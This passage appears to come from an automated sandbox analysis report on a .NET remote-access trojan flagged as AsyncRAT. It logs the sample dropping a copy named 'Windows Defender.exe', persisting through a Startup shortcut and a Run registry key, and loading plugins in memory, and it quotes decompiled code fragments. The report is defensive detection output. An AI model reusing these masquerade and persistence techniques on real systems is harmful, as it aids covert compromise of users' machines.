Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\owuP726k3d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Windows Defender.lnk.0.dr

LNK file: ..\..\..\..\..\Windows Defender.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: owuP726k3d.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: owuP726k3d.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: owuP726k3d.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: owuP726k3d.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: owuP726k3d.exe, Helper.cs	.Net Code: XMemory System.AppDomain.Load(byte[])
Source: owuP726k3d.exe, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: owuP726k3d.exe, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: owuP726k3d.exe, Messages.cs	.Net Code: Memory
Source: Windows Defender.exe.0.dr, Helper.cs	.Net Code: XMemory System.AppDomain.Load(byte[])
Source: Windows Defender.exe.0.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: Windows Defender.exe.0.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: Windows Defender.exe.0.dr, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\owuP726k3d.exe	Code function: 0_2_00007FFB4AD100BD pushad ; iretd	0_2_00007FFB4AD100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4AC0D2A5 pushad ; iretd	2_2_00007FFB4AC0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4AD20988 push E95A4FD0h; ret	2_2_00007FFB4AD209C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4AD200BD pushad ; iretd	2_2_00007FFB4AD200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4ADF2316 push 8B485F93h; iretd	2_2_00007FFB4ADF231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB4AC0D2A5 pushad ; iretd	5_2_00007FFB4AC0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB4AD200BD pushad ; iretd	5_2_00007FFB4AD200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB4ADF2316 push 8B485F93h; iretd	5_2_00007FFB4ADF231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFB4AC1D2A5 pushad ; iretd	8_2_00007FFB4AC1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFB4AD300BD pushad ; iretd	8_2_00007FFB4AD300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFB4AE02316 push 8B485F92h; iretd	8_2_00007FFB4AE0231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ABFD2A5 pushad ; iretd	10_2_00007FFB4ABFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4AD100BD pushad ; iretd	10_2_00007FFB4AD100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADE2316 push 8B485F94h; iretd	10_2_00007FFB4ADE231B
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Code function: 14_2_00007FFB4AD300BD pushad ; iretd	14_2_00007FFB4AD300C1
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Code function: 15_2_00007FFB4AD100BD pushad ; iretd	15_2_00007FFB4AD100C1

Source: C:\Users\user\Desktop\owuP726k3d.exe

File created: C:\Users\user\AppData\Roaming\Windows Defender.exe

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: owuP726k3d.exe, type: SAMPLE
Source: Yara match	File source: 0.0.owuP726k3d.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender.exe, type: DROPPED

Source: C:\Users\user\Desktop\owuP726k3d.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk

Jump to behavior

Source: C:\Users\user\Desktop\owuP726k3d.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk

Jump to behavior

Source: C:\Users\user\Desktop\owuP726k3d.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender			Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
